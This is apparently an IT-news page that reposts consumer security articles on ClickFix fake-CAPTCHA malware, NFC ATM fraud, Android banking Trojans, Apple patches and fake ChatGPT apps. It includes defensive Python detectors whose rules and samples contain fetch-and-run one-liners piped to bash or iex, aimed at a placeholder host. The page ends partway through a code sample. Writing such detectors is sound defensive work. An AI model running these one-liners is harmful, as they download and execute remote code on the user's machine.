IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Fake CAPTCHA sites now have tutorial videos to help victims install malware

Early on in 2025, I described how criminals used fake CAPTCHA sites and a clipboard hijacker to provide instructions for website visitors that would effectively infect their own machines with an information stealer known as the Lumma Stealer.

ClickFix is the name researchers have since given to this type of campaign—one that uses the clipboard and fake CAPTCHA sites to trick users into running malicious commands themselves.

Later, we found that the cybercriminals behind it seemed to be running some A/B tests to figure out which infection method worked best: ClickFix, or the more traditional file download that disguises malware as a useful application.

The criminals probably decided to go with ClickFix, because they soon came up with a campaign that targeted Mac users to spread the infamous Atomic Stealer.

Now, as reported by researchers from Push Security, the attackers behind ClickFix have tried to make the campaign more “user-friendly.”  The latest fake CAPTCHA pages include embedded video tutorials showing exactly how to run the malicious code.

[Image: instructions for Mac users. Image courtesy of Push Security]

The site automatically detects the visitor’s operating system and provides matching instructions, copying the right code for that OS straight to the clipboard—making typos less likely and infection more certain.

A countdown timer adds urgency, pressuring users to complete the “challenge” within a minute. When people rush instead of thinking things through, social engineering wins.

Unsurprisingly, most of these pages spread through SEO-poisoned Google search results, although they also circulate via email, social media, and in-app ads.

How to stay safe

With ClickFix running rampant—and it doesn’t look like it’s going away anytime soon—it’s important to be aware, careful, and protected.

  • Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action. Sophisticated ClickFix pages add countdowns, user counters, or other pressure tactics to make you act quickly.
  • Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
  • Secure your devices. Use an up-to-date real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?
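The advice above about copied commands can be turned into a simple pre-paste check. The following is an added example, not code from the article or from any product it mentions: it scores text that a web page placed on the clipboard, and the rule set, verdict names, and sample strings (which use the reserved example.invalid domain) are assumptions made for illustration.

```python
import re

# Heuristic rules: assumptions for this example, not a vendor signature set.
RULES = [
    ("interpreter", re.compile(
        r"\b(?:powershell|pwsh|cmd(?:\.exe)?|mshta|osascript|bash|zsh|sh)\b", re.I)),
    ("remote-fetch", re.compile(
        r"\b(?:curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod)\b"
        r"[^\n]*?https?://", re.I)),
    ("pipe-to-shell", re.compile(
        r"\|\s*(?:bash|sh|zsh|iex|invoke-expression)\b", re.I)),
    # Long base64-looking run: an encoded payload rather than readable text.
    ("encoded-blob", re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")),
    # Zero-width characters or long whitespace runs that push text out of view.
    ("hidden-padding", re.compile(r"[\u200b\u200c\u200d\u2060\ufeff]|[ \t]{40,}")),
    # CAPTCHA wording has no business inside a command line.
    ("captcha-lure", re.compile(r"captcha|not a robot|verif(?:y|ication)", re.I)),
]
COMMAND_TRAITS = {"interpreter", "remote-fetch", "pipe-to-shell"}
AGGRAVATING = {"encoded-blob", "hidden-padding", "captcha-lure"}


def screen_clipboard(text):
    """Return (verdict, hits) for text a web page placed on the clipboard.

    verdict is "allow" (no command traits), "warn" (looks like a command),
    or "block" (a command that fetches and runs remote content, or a command
    combined with encoding, hidden padding, or CAPTCHA wording).
    """
    hits = [name for name, rx in RULES if rx.search(text)]
    traits = COMMAND_TRAITS.intersection(hits)
    if not traits:
        verdict = "allow"
    elif ("remote-fetch" in traits and len(traits) > 1) or AGGRAVATING.intersection(hits):
        verdict = "block"
    else:
        verdict = "warn"
    return verdict, hits


# Constructed sample clipboard contents (not taken from any real campaign).
SAMPLES = [
    "curl -s https://example.invalid/verify.sh | bash  # I am not a robot",
    'powershell -c "irm https://example.invalid/check | iex"',
    "bash build.sh",
    "Meeting notes: verify the captcha vendor contract by Friday.",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict, hits = screen_clipboard(sample)
        print(f"{verdict:5}  {hits}  {sample[:50]!r}")
```

CAPTCHA wording alone never raises the verdict; it only counts when the same text also looks like a command.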


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Hackers commit highway robbery, stealing cargo and goods

There’s a modern-day train heist happening across America, and this time, some of the bandana-masked robbers are sitting behind screens.

According to new research, a group of cybercriminals has been attacking trucking, freight, and logistics companies for months, impersonating brands and even diverting real cargo shipments to unapproved locations so that the stolen goods can be sold or shipped elsewhere.

The impact, the researchers said, extends far beyond the logistics industry:

“Such crimes can create massive disruptions to supply chains and cost companies millions, with criminals stealing everything from energy drinks to electronics. The most targeted commodities are food and beverage products.”

Although the cyberattacks were mostly seen in North America, cargo theft is a problem across the world, impacting consumers and businesses that rely on the often-overlooked network of trucks, trains, ships, planes, and people.

In these attacks, cybercriminals compromise the accounts of carrier companies that transport goods from one location to the next. By posing as legitimate carriers, they can place real bids on shipments and then redirect them to unauthorized destinations, where they or their partners will receive and steal the cargo.

Researchers found that attackers take control of these accounts in at least one of three ways.

1. Fake load boards

Attackers may post a fake order on what’s called a “load board,” a digital marketplace that connects shippers with carriers so that cargo can be assigned and accepted. But when legitimate carriers inquire about the fake load board posting, the criminals reply with an email that includes a malicious link that, when clicked, installs Remote Monitoring and Management (RMM) software. (To make the scam more convincing, the cybercriminals also compromise a “broker” account so their load board posting looks legitimate.)

Despite the sneaky install method, RMM software itself is entirely legitimate. It’s used by IT support teams to remotely fix issues for employees. But that legitimacy makes RMM software perfect for any cybercriminal campaign because it may raise fewer red flags from older antivirus tools.

Once the attackers gain access to a carrier’s account, they can also deploy malware to steal account credentials, giving them greater access to a company’s network.

2. Compromised email accounts

A second observed attack method involved hijacking an active email address and then impersonating the owner when responding to emails about cargo orders and shipments. Here, too, cybercriminals inserted malicious links into emails that eventually install RMM tools.

3. Social engineering

Finally, researchers also observed the attackers sending direct phishing emails to carriers, using classic social engineering tricks—like sending a bogus bill to lure victims into clicking malicious links.

While many of the well-tested security best practices still apply—like not clicking on links inside emails—one of the strongest defenses is to use a security product that notifies users about RMM tools (also sometimes referred to as Remote Desktop Programs) installed on their device. RMM tools are legitimate, but because of their abuses in cybercriminal campaigns, it is important that every installation is verified and tracked.



Android malware steals your card details and PIN to make instant ATM withdrawals

The Polish Computer Emergency Response Team (CERT Polska) analyzed a new Android-based malware that uses NFC technology to perform unauthorized ATM cash withdrawals and drain victims’ bank accounts.

Researchers found that the malware, called NGate, lets attackers withdraw cash from ATMs (Automated Teller Machines, or cash machines) using banking data exfiltrated from victims’ phones—without ever physically stealing the cards.

NFC is a wireless technology that allows devices such as smartphones, payment cards, and terminals to communicate when they’re very close together. So, instead of stealing your bank card, the attackers capture NFC (Near Field Communication) activity on a mobile phone infected with the NGate malware and forward that transaction data to devices at ATMs. In NGate’s case the stolen data is sent over the network to the attackers’ servers rather than being relayed purely by radio.

NFC comes in a few “flavors.” Some produce a static code—for example, the card that opens my apartment building door. That kind of signal can easily be copied to a device like my “Flipper Zero” so I can use that to open the door. But sophisticated contactless payment cards (like your Visa or Mastercard debit and credit cards) use dynamic codes. Each time you use the NFC, your card’s chip generates a unique, one-time code (often called a cryptogram or token) that cannot be reused and is different every time.

So, that’s what makes the NGate malware more sophisticated. It doesn’t simply grab a signal from your card. The phone must be infected, and the victim must be tricked into performing a tap-to-pay or card-verification action and entering their PIN. When that happens, the app captures all the necessary NFC transaction data exchanged — not just the card number, but the fresh one-time codes and other details generated in that moment.

The malware then instantly sends all that NFC data, including the PIN, to the attacker’s device. Because the codes are freshly generated and valid only for a short time, the attacker uses them immediately to imitate your card at an ATM; the accomplice at the ATM presents the captured data using a card-emulating device such as a phone, smartwatch, or custom hardware.

But, as you can imagine, being ready at an ATM when the data comes in takes planning—and social engineering.

First, attackers need to plant the malware on the victim’s device. Typically, they send phishing emails or SMS messages to potential victims. These often claim there is a security or technical issue with their bank account, trying to induce worry or urgency. Sometimes, they follow up with a phone call, pretending to be from the bank. These messages or calls direct victims to download a fake “banking” app from a non-official source, such as a direct link instead of Google Play.

Once installed, the app asks for permissions and leads victims through fake “card verification” steps. The goal is to get victims to act quickly and trustingly—while an accomplice waits at an ATM to cash out.

How to stay safe

NGate only works if your phone is infected and you’re tricked into initiating a tap-to-pay action on the fake banking app and entering your PIN. So the best way to stay safe from this malware is to keep your phone protected and stay vigilant to social engineering:

  • Stick to trusted sources. Download apps only from Google Play, Apple’s App Store, or the official provider. Your bank will never ask you to use another source.
  • Protect your devices. Use an up-to-date real-time anti-malware solution like Malwarebytes for Android, which already detects this malware.
  • Do not engage with unsolicited callers. If someone claims to be from your bank, tell them you’ll call them back at the number you have on file.
  • Ignore suspicious texts. Do not respond to or act upon unsolicited messages, no matter how harmless or urgent they seem.

Malwarebytes for Android detects these banking Trojans as Android/Trojan.Spy.NGate.C; Android/Trojan.Agent.SIB01022b454eH140; Android/Trojan.Agent.SIB01c84b1237H62; Android/Trojan.Spy.Generic.AUR9552b53bH2756 and Android/Trojan.Banker.AURf26adb59C19.


We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Take control of your privacy with updates on Malwarebytes for Windows

It’s getting harder to keep your Windows space truly yours, as Microsoft increasingly serves annoying ads and tracks your data across third-party apps.

Pushing back against your eroding privacy has been a scattered and sometimes complicated process… but we’re making it easier for you. With the latest version of Malwarebytes for Windows, we’ve introduced Privacy Controls—a simple screen that brings several privacy settings together in one place, so you can easily decide how Microsoft handles your data.

Privacy Controls

With four simple toggles, you can decide whether to:

  • Allow third-party apps to use your Advertising ID
  • Allow third-party content on your lock screen
  • Allow third-party content on your Start screen
  • Allow Microsoft to use Windows diagnostic data

You can also disable all privacy-impacting features at once.

There’s more good news for your privacy. Malwarebytes now also alerts you when “Remote Desktop Programs” are installed on your device.

Remote Desktop Programs are powerful, often legitimate tools used by IT teams and tech support to fix problems remotely—especially since remote work became common. But the remote access these programs provide is powerful, which makes them a target for cybercriminals. If a real tech support account is compromised, a hacker could use the remote desktop program to tamper with your devices or spy on sensitive information.

There’s also a type of scam—called a tech support scam—where criminals trick people into installing remote desktop programs so they can take control of the victim’s device, potentially stealing data or money down the line.  

By flagging these programs, Malwarebytes gives you more visibility into what’s on your computer, so you can stay in control of your privacy and security.



Cyberattacks on UK water systems reveal rising risks to critical infrastructure

Digital intruders have been targeting UK drinking water systems in what seems to be a growing risk.

Recorded Future News sent a request to the UK’s Drinking Water Inspectorate (DWI), the organization responsible for ensuring that drinking water is safe, for details on cyberattacks affecting the country’s water system. Using freedom of information laws, the site discovered five incidents that had taken place since January 1, 2024.

A steady stream of water attacks

These aren’t the first attacks on UK water systems. In August 2022, the Clop ransomware gang hit South Staffordshire Water, thinking that it was actually Thames Water. The attack focused on stealing customer data, meaning water supplies weren’t disrupted, although corporate systems were affected.

In late 2023, pro-Iranian hackers disrupted water supplies in County Mayo, Ireland. The intruders, known as the Cyber Av3ngers group, caused outages across 160 homes for two days. The attack was politically motivated by the utility’s apparent use of an Israeli-made tool.

These are far from the only attacks on water systems around the world. In February last year, CISA warned that a Chinese state-sponsored group had spent nine months moving laterally through a US water facility.

In that incident, attackers gained access using an administrator’s login and spent months inside the infrastructure, nosing around databases and other assets. CISA linked the intrusion to Volt Typhoon—a group that also targeted telecommunications companies around the world. The attackers were described as “OT adjacent,” meaning they had reached administrative systems close enough to potentially impact the operational technology that controls water flow.

The attacks keep coming. Just last month, the Canadian Centre for Cybersecurity reported an attack on a municipal water facility. Hacktivists managed to alter water pressure, causing “degraded service” for the local community.

It’s always worrying when attackers target critical national infrastructure. When attackers hit Colonial Pipeline in 2021, they only compromised its administrative network (the part that handles paperwork). But the company was spooked enough that it shut down its fuel distribution systems too, as a protective measure, causing gasoline prices to spike across the US East Coast.

Many attacks on water systems might go unreported, depending on where they happen. The UK’s Network and Information Systems (NIS) regulations dictate that critical national infrastructure organizations should reveal cyber attacks to the public. However, that only applies if those attacks caused disruption.

That’s why the attacks uncovered by Recorded Future haven’t been made public until now. While worrying, they didn’t affect the UK’s water supply. A 2022 review of the NIS regulations criticized this limited disclosure, noting that attacks with the potential to disrupt services often went unreported.

Although the attacks reported to Recorded Future were voluntarily disclosed to the DWI by suppliers, upcoming legal changes could lower the bar for mandatory reporting. The UK’s proposed Cyber Security and Resilience Bill would expand disclosure requirements, increasing transparency about attacks that could affect the water supply. The Bill is expected to reach Parliament in 2025—though time is running short.

A resource under pressure

Water is under considerable threat already in the UK, with major droughts declared this year. The Met Office reports that this year’s February-to-April period was the driest since 1956, with rainfall at just half the long-term average. River flows have dropped sharply, soil moisture is down, and the National Drought Group has met to coordinate a national response.

Water companies already have plans to manage shortages, the UK government says. But as the cyberattacks mount, the question is: are their system defenses strong enough too?



Should you let Chrome store your driver’s license and passport?

Google has rolled out a new autofill feature for Chrome that goes beyond storing just your passwords, addresses, and credit card numbers. The new “enhanced autofill” can now stash your driver’s license, passport details, VIN, or license plate information. Sounds convenient, right?

But just because you can, it doesn’t mean you should.

Let’s face it: filling out government forms or travel bookings online is a pain. Anything that saves a few minutes—or spares you from hunting down your passport at the back of a drawer—feels like a win, especially if Chrome can neatly autofill those fields. And yes, Google promises encryption, explicit permission for autofill, and manual activation only if you want it.

But let’s think this through. Is storing your most personally identifiable information—like government-issued IDs—in the market-dominant browser a good idea? Because that’s what Chrome is.

Chrome’s market share (over 73% at the time of writing) makes it the internet’s biggest bullseye for criminals. Whether you’re using the enhanced autofill or the regular one, browser-based storage schemes are relentlessly hunted by password stealers, infostealers, and other types of malware.

And let’s not forget phishing attempts. Maybe having to dig through your drawer while you think about why a website needs that information isn’t such a bad thing after all.

Sure, Chrome encrypts autofill data, only saves your info with permission, and asks for confirmation before pasting it into a form. You can also ramp up security with two-factor authentication (2FA) and a Chrome sync passphrase. But when cybercriminals get the right kind of access (by stealing a browser session, finding an unlocked device, or getting you to install a rogue extension), your sensitive information is in danger. And with what Chrome can now store, that could mean your identity.

Chrome’s enhanced autofill promises a smoother online ride, but the consequences of storing government IDs in your browser could outweigh the perks. Cybercriminals love a big target—and with Chrome’s popularity, the bounty only grows. When the reward for a criminal is your passport, driver’s license, or identity, convenience should come second to caution.

Thankfully, someone decided it was a good idea to turn off this feature by default, but if you want to check, here’s how to find it:

  • Open Chrome.
  • In the main Chrome menu, click on Settings.
  • Under Autofill and passwords, select Enhanced autofill if present.

Better alternative: password managers

We would advise that if you must store this kind of information digitally, use a password manager. These tools are built for secure storage—they’re audited for security, separate from browser processes, and don’t automatically serve up your data to any site that happens to have the right input fields.

Stick to a dedicated password manager and stay in control of what’s stored and where it gets filled out. Remember: the less a browser knows about your life, the safer you are when someone eventually tries to break in.

Other recommendations:


We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Apple patches 50 security flaws—update now

Apple has released security updates for iPhones, iPads, Macs, Apple Watches, Apple TVs, Safari, and Xcode, fixing nearly 50 security flaws. Some of these bugs could let cybercriminals see your private data, take control of parts of your device, or break key security protections.

Installing these updates as soon as possible keeps your personal information—and everything else on your Apple devices—safe from attack.

What caught our eye

Although Apple never releases full details before everyone has had a chance to apply the updates, two serious security flaws stand out:

  • CVE-2025-43442: This vulnerability is a permission issue which is fixed in iOS 26.1 and iPadOS 26.1. It could allow an app to identify which other apps a user has installed. You can imagine that if a banking Trojan—like this one on Android—can see which banking apps and crypto wallets someone uses, its operators can tailor their social engineering strategies to target that user.
  • CVE-2025-43455: This is a privacy issue in watchOS 26.1, visionOS 26.1, iOS 26.1, and iPadOS 26.1. It allows malicious apps to capture screenshots of sensitive information in embedded views. Apple addressed this by tightening privacy checks and isolation policies.

Updates for your particular device

This table shows which updates are available and points you to the relevant security content for that operating system (OS).

Update | Available for
iOS 26.1 and iPadOS 26.1 | iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later
macOS Tahoe 26.1 | macOS Tahoe
macOS Sequoia 15.7.2 | macOS Sequoia
macOS Sonoma 14.8.2 | macOS Sonoma
tvOS 26.1 | Apple TV HD and Apple TV 4K (all models)
watchOS 26.1 | Apple Watch Series 6 and later
visionOS 26.1 | Apple Vision Pro
Safari 26.1 | macOS Sonoma and macOS Sequoia
Xcode 26.1 | macOS Sequoia 15.6 and later

How to update your devices

How to update your iPhone or iPad

For iOS and iPadOS users, here’s how to check if you’re using the latest software version:

  • Go to Settings > General > Software Update.
  • Turn on Automatic Updates if you haven’t already—you’ll find it on the same screen.

[Image: iPadOS 26.1 ready to update]

How to update macOS on any version

To update macOS on any supported Mac, use the Software Update feature, which Apple designed to work consistently across all recent versions. Here are the steps:

  • Click the Apple menu in the upper-left corner of your screen.
  • Choose System Settings (or System Preferences on older versions).
  • Select General in the sidebar, then click Software Update on the right. On older macOS, just look for Software Update directly.
  • Your Mac will check for updates automatically. If updates are available, click Update Now (or Upgrade Now for major new versions) and follow the on-screen instructions. Before you upgrade to macOS Tahoe 26, please read these instructions.
  • Enter your administrator password if prompted, then let your Mac finish the update (it might need to restart during this process).
  • Make sure your Mac stays plugged in and connected to the internet until the update is done.

How to update Apple Watch

Ensure your iPhone is paired with your Apple Watch and connected to Wi-Fi, then:

  • Keep your Apple Watch on its charger and close to your iPhone.
  • Open the Watch app on your iPhone.
  • Tap General > Software Update.
  • If an update appears, tap Download and Install.
  • Enter your iPhone passcode or Apple ID password if prompted.

Your Apple Watch will automatically restart during the update process. Make sure it remains near your iPhone and on charge until the update completes.

How to update Apple TV

Turn on your Apple TV and make sure it’s connected to the internet, then:

  • Open the Settings app on Apple TV.
  • Navigate to System > Software Updates.
  • Select Update Software.
  • If an update appears, select Download and Install.

The Apple TV will download the update and restart as needed. Keep your device connected to power and Wi-Fi until the process finishes.

How to update your Safari browser

Safari updates are included with macOS updates, so installing the latest version of macOS will also update Safari. To check manually:

  • Open the Apple menu > System Settings > General > Software Update.
  • If you see a Safari update listed separately, click Update Now to install it.
  • Restart your Mac when prompted.

If you’re on an older macOS version that’s still supported (like Sonoma or Sequoia), Apple may offer Safari updates independently through Software Update.

How to update Xcode

Xcode is Apple’s developer tool for building apps, so most people won’t have this, but if you do, you’ll need to keep it updated. Xcode updates come through the App Store:

  • Open the App Store on your Mac.
  • Click Updates in the sidebar.
  • If an Xcode update is available, click Update next to it.
  • You can also search for “Xcode” directly and click Update or Get if you’ve uninstalled it.


“Sneaky” new Android malware takes over your phone, hiding in fake news and ID apps

Researchers at Cyfirma have investigated Android Trojans capable of stealing sensitive data from compromised devices. The malware spreads by pretending to be trusted apps—like a news reader or even digital ID apps—tricking users into downloading it by accident.

In reality, it’s Android-targeting malware that preys on people who use banking and cryptocurrency apps. And a sneaky one. Once installed, it doesn’t announce itself in any way, but quietly works in the background to steal information such as login details and money.

First, it checks if it’s running on a real phone or in a security test system so it can avoid detection. Then, it asks users for special permissions called “Accessibility Services,” claiming these help improve the app but actually giving the malware control over the device without the owner noticing. It also adds itself as a Device Administrator app.

[Image: Device admin apps. Image courtesy of Cyfirma]

With these permissions, the Trojan can read what’s on the screen, tap buttons, and fill in forms as if it were the user. It also overlays fake login screens on top of real banking and cryptocurrency apps, so when someone enters their username and password, the malware steals them.

Simply put, the Android overlay feature allows an app to appear on top of another app. Legitimate apps use overlays to show messages or alerts—like Android chat bubbles in Messenger—without leaving the current screen.

The Trojan connects to a remote command center, sending information about the phone, its location, and which banking apps are installed. At this point, attackers can send new instructions to the malware, like downloading updates to hide better or deleting traces of its activity. As soon as it runs, the Trojan also silences notifications and sounds so users don’t notice anything out of the ordinary.

The main risk is financial loss: once cybercriminals have banking credentials or cryptocurrency wallet codes, they can steal money or assets without warning. At this point in time the malware targets banking users in Southeast Asia, but its techniques could spread anywhere.

As we rely more on our phones for payments and important tasks, it’s clear that our mobile devices need the same level of protection that we expect on our laptops.

Malwarebytes for Android detects these banking Trojans as Android/Trojan.Spy.Banker.AUR9b9b491bC44.

How to stay safe

  • Stick to trusted sources. Download apps—especially VPNs and streaming services—only from Google Play, Apple’s App Store, or the official provider. Never install something just because a link in a forum or message promises a shortcut.
  • Check an app’s permissions. If an app asks for control over your device, your settings, Accessibility Services, or wants to install other apps, stop and ask yourself why. Does it really need those permissions to do what you expect it to do?
  • Use layered, up-to-date protection. Install real-time anti-malware protection on your Android that scans for new downloads and suspicious activity. Keep both your security software and your device system updated—patches fix vulnerabilities that attackers can exploit.
  • Stay informed. Follow trustworthy cybersecurity news and share important warnings with friends and family.
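The permission check recommended above can also be done before an app is ever installed, by reading its manifest. This is an added example, not code from Cyfirma or Malwarebytes: it assumes the APK's AndroidManifest.xml has already been decoded to text XML, and the package names, sample manifests, and three-level rating are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Manifest markers for the capabilities the article describes.
USES_PERMISSION = {
    "android.permission.SYSTEM_ALERT_WINDOW": "overlay",
    "android.permission.REQUEST_INSTALL_PACKAGES": "installs-apps",
}
COMPONENT_BINDING = {
    ("service", "android.permission.BIND_ACCESSIBILITY_SERVICE"): "accessibility",
    ("receiver", "android.permission.BIND_DEVICE_ADMIN"): "device-admin",
}


def triage_manifest(xml_text):
    """Summarise which high-impact capabilities a decoded manifest declares."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        # A manifest that cannot be parsed is itself worth a manual look.
        return {"package": None, "capabilities": [], "rating": "unreadable"}

    caps = set()
    for node in root.iter("uses-permission"):
        label = USES_PERMISSION.get(node.get(ANDROID + "name"))
        if label:
            caps.add(label)
    for (tag, permission), label in COMPONENT_BINDING.items():
        for node in root.iter(tag):
            if node.get(ANDROID + "permission") == permission:
                caps.add(label)

    # Rating scheme (assumption): Accessibility plus any other capability is
    # the combination described in the article; one capability alone is
    # common in legitimate apps and only merits a second look.
    if "accessibility" in caps and len(caps) >= 2:
        rating = "high"
    elif caps:
        rating = "review"
    else:
        rating = "low"
    return {"package": root.get("package"),
            "capabilities": sorted(caps), "rating": rating}


# Constructed manifests (hypothetical apps, not real samples).
FAKE_NEWS = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.dailynews">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application>
    <service android:name=".HelperService"
        android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
    <receiver android:name=".AdminReceiver"
        android:permission="android.permission.BIND_DEVICE_ADMIN"/>
  </application>
</manifest>"""

SCREEN_READER = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.screenreader">
  <application>
    <service android:name=".ReaderService"
        android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
  </application>
</manifest>"""

PLAIN_READER = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.headlines">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application/>
</manifest>"""

if __name__ == "__main__":
    for manifest in (FAKE_NEWS, SCREEN_READER, PLAIN_READER):
        print(triage_manifest(manifest))
```

A "high" rating is a prompt to ask why a news reader or ID app needs that combination, not proof that the app is malicious.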

Indicators of compromise

File name: IdentitasKependudukanDigital.apk

SHA-256: cb25b1664a856f0c3e71a318f3e35eef8b331e047acaf8c53320439c3c23ef7c

File name: identitaskependudukandigital.apk

SHA-256: 19456fbe07ae3d5dc4a493bac27921b02fc75eaa02009a27ab1c6f52d0627423

File name: identitaskependudukandigital.apk

SHA-256: a4126a8863d4ff43f4178119336fa25c0c092d56c46c633dc73e7fc00b4d0a07



Sling TV turned privacy into a game you weren’t meant to win

Streaming service Sling TV has settled with the California Attorney General over allegations that it blocked users from exercising their privacy rights.

The company will pay $530,000 after being accused of making it difficult for customers to opt out of its data collection practices.

The California Consumer Privacy Act (CCPA) says consumers must be able to easily see how companies use their data and opt out if they choose. But according to a press release from the Attorney General’s office, Sling misled users who tried.

When users attempted to opt out of having their data shared, Sling redirected them to a page for changing cookie settings. Cookies are small files that help websites recognize users and track activity. However, changing the cookie controls on this page didn’t actually stop data sharing. To do that, users had to find and fill out a separate online form—even logged-in customers had to provide their name, address, email, and phone number, which Sling already had.

Users couldn’t opt out from connected devices either. Instead, they had to manually type a complex URL into a separate browser, the complaint said.

Children in the crosshairs

Sling also failed to protect children’s privacy. It didn’t age-screen users or offer kids’ profiles that avoided targeted advertising. The company even bought data from brokers to build detailed viewer profiles—including information about children in the home, the complaint alleged.

The complaint stated:

“Sling TV uses data about the presence of children in the household, and, in some cases, their age ranges, to build specific groups of viewers that can be targeted for cross-context behavioral advertising.”

The Sling case follows a string of privacy controversies in streaming. We recently wrote about how Roku faced similar accusations of selling children’s viewing data to advertisers and data brokers.

Falling subscriber numbers, rising revenue

Sling has been losing subscribers fast—down to 1.78 million—but it’s still making more money per viewer. How? By raising prices and leaning on targeted advertising, the very practice that just got it fined. Sling is a division of DISH Media, which says in its marketing material:

“DISH Media is helping brands and agencies reimagine their media mix to maximize return on ad spend… helping advertisers optimize reach, frequency, and return on investment through more strategic platform planning.”

What the settlement changes (and what it doesn’t)

Under the settlement, Sling TV must stop sending users who opt out to a cookie settings page, stop requiring logged-in users to fill out forms with data it already holds, and add a direct opt-out mechanism to its app. It must also let parents create kids’ profiles and explain how to protect children’s privacy.

This is Sling’s first major privacy violation, but DISH Network has faced scrutiny before. In 2020, it paid a $210 million penalty—the largest ever under the FTC’s Telemarketing Sales Rule—for making millions of unlawful telemarketing calls.



Attack of the clones: Fake ChatGPT apps are everywhere

The mobile AI gold rush has flooded app stores with lookalikes—shiny, convincing apps promising “AI image generation,” “smart chat,” or “instant productivity.” But behind the flashy logos lurks a spectrum of fake apps, from harmless copycats to outright spyware.

Spoofing trusted brands like OpenAI’s ChatGPT has become the latest tactic for opportunistic developers and cybercriminals to sell their “inventions” and spread malware.

A quick scan of app stores in 2025 shows an explosion of “AI” apps. As Appknox research reveals, these clones fall along a wide risk spectrum:

  • Harmless wrappers: Some unofficial “wrappers” connect to legitimate AI APIs with basic add-ons like ads or themes. These mostly create privacy or confusion risks, rather than direct harm.
  • Adware impersonators: Others abuse AI branding just to profit from ads. For example, a DALL·E image generator clone mimicking OpenAI’s look delivers nothing but aggressive ad traffic. Its only purpose: funneling user data to advertisers under the guise of intelligence. Package com.openai.dalle3umagic is detected by Malwarebytes as Adware.
  • Malware disguised as AI tools: At the extreme, clones like WhatsApp Plus use spoofed certificates and obfuscated code to smuggle spyware onto devices. Once installed, these apps scrape contacts, intercept SMS messages (including one-time passwords), and quietly send everything to criminals via cloud services. WhatsApp Plus is an unofficial, third-party modified version of the real WhatsApp app, and some variants falsely claim to include AI-powered tools to lure users. Package com.wkwaplapphfm.messengerse is detected by Malwarebytes as Android/Trojan.Agent.SIB0185444803H262.

We’ve written before about cybercriminals hiding malware behind fake AI tools and installed packages that mimic popular services like ChatGPT, the lead monetization service Nova Leads, and an AI-empowered video tool called InVideo AI.

How to stay safe from the clones

As is true with all malware, the best defense is to prevent an attack before it happens. Follow these tips to stay safe:

  • Download only from official stores. Stick to Google Play or the App Store. Don’t download apps from links in ads, messages, or social media posts.
  • Check the developer name. Fake apps often use small tweaks—extra letters or punctuation—to look legitimate. If the name doesn’t exactly match, skip it.
  • Read the reviews (but carefully). Real users often spot bad app behavior early. Look for repeated mentions of pop-ups, ads, or unexpected charges.
  • Limit app permissions. Don’t grant access to contacts, messages, or files unless it’s essential for the app to work.
  • Keep your device protected. Use trusted mobile security software that blocks malicious downloads and warns you before trouble starts.
  • Delete suspicious apps fast. If something feels off—battery drain, pop-ups, weird network traffic—uninstall the app and run a scan.
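
The "check the developer name" tip can be automated for a fleet or an app inventory. The sketch below is an added example, not code from Malwarebytes or Appknox: it compares package IDs and developer names with a small allowlist and flags brand names that appear in unlisted identifiers, along with one-character lookalikes. The allowlist entries and the two developer-name samples are assumptions constructed for illustration; the two clone package IDs are the ones named above.

```python
import re
import unicodedata

# Assumed allowlist; verify each entry against the vendor's own store listing.
OFFICIAL = {
    "openai": {"com.openai.chatgpt", "OpenAI"},
    "whatsapp": {"com.whatsapp", "WhatsApp LLC"},
}

def normalize(text):
    """Fold case and accents, undo digit-for-letter swaps, drop punctuation."""
    ascii_text = unicodedata.normalize("NFKD", text).encode("ascii", "ignore").decode()
    swapped = ascii_text.lower().translate(str.maketrans("0135", "oies"))
    return re.sub(r"[^a-z]", "", swapped)

def edit_distance(a, b):
    """Levenshtein distance, computed row by row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def triage(identifier):
    """Classify a package ID or developer name against the allowlist."""
    if any(identifier in names for names in OFFICIAL.values()):
        return "official"
    # Check each dot- or space-separated part, plus the whole string joined up.
    parts = [normalize(p) for p in re.split(r"[.\s]+", identifier)]
    parts.append(normalize(identifier))
    for brand in OFFICIAL:
        if any(brand in p for p in parts):
            return "brand-name-in-unlisted-identifier"
        if any(edit_distance(p, brand) == 1 for p in parts):
            return "lookalike"
    return "no-brand-match"

# Constructed inventory; the entries marked (page) are named in the article.
SAMPLES = [
    "com.openai.chatgpt",
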